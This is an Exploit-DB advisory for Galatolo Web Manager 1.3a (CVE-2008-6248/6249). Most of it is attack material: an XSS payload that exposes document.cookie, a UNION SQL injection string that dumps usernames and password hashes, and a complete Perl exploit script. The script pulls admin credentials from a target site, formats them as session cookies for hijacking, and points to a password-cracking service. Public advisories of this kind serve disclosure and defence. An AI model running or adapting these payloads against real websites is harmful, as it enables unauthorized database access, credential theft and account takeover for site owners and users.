Galatolo Web Manager 1.3a <= XSS / Remote SQL Injection Vulnerability

2008-07-15T00:00:00
ID EDB-ID:6075
Type exploitdb
Reporter StAkeR
Modified 2008-07-15T00:00:00

Description

Galatolo Web Manager 1.3a <= XSS / Remote SQL Injection Vulnerability. CVE-2008-6248,CVE-2008-6249. Webapps exploit for php platform

                                        
                                            --==+============================================================================+==--
--==+   Galatolo Web Manager 1.3a &lt;= XSS / Remote SQL Injection Vulnerability    +==--    
--==+============================================================================+==--

 [*] Discovered By: StAkeR ~ StAkeR@hotmail.it
 [+] Discovered On: 14 Jul 2008
 [+] Download: http://gwm.dev-area.org/view.php?id=8

 [*] Vulnerabilities:
 
 [*] XSS &lt;= 1.3a
 [+] all.php?tag= [Code Javascript]
 [+] http://site.com/all.php?tag=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
 
 [*] SQL (plugin users) 1.3a
 [+] plugins/users/index.php?id= [Code SQL]
 [+] -1+union+select+null,concat(user,0x3a,pass),null,concat(user(),0x3a,database(),0x3a,version())+from+users+where+id=1--
 
 [*] Exploit:

 #!/usr/bin/perl 
 use strict;
 use LWP::UserAgent;

 my $host = shift;
 my ($start,$content,@login);
 my $evilxx = "/plugins/users/index.php?id=-1+union+select+1,concat(0x25,user,0x25,pass),null,null+from+users+where+id=1--";

 if($host =~ /^http:\/\/?/i)
 {
   $start = new LWP::UserAgent or die "[+] Unable to connect\n";
   $start-&gt;timeout(1);
   $start-&gt;agent("Mozilla/4.0 (compatible; Lotus-Notes/5.0; Windows-NT)");
   $content = $start-&gt;get($host.$evilxx);
  
   if($content-&gt;is_success)
   {
     if($content-&gt;content =~ /%(.+?)%([0-9a-f]{32})/)
     {
       push(@login,$1,$2);
       print "[+] Login:\n";
       print "[+] Username: $login[0]\n";
       print "[+] Password: $login[1]\n\n";
      
       print "[+] Cookie Session:\n";
       print "[+] gwm_user = $login[0]\n";
       print "[+] gwm_pass = $login[1]\n\n";
      
       print "[+] Crack Password:\n";
       print "[+] md5(md5(password)) for crack:\n"; 
       print "[+] http://passcracking.com\n";
     }
     else
     {
       print "[+] Exploit Failed\n";
       print "[+] Site Not Vulnerable\n";
     }
   }
 }
 else
 {
   print "[+] Galatolo Web Manager (plugin users) 1.3 Remote SQL Injection\n";
   print "[+] Exploit Coded By: StAkeR ~ StAkeR\@hotmail.it\n\n";
   print "[+] Usage: Perl $0 &lt;host&gt;\n";
   print "[+] Usage: Perl $0 http://site.com\n";
 }

# milw0rm.com [2008-07-15]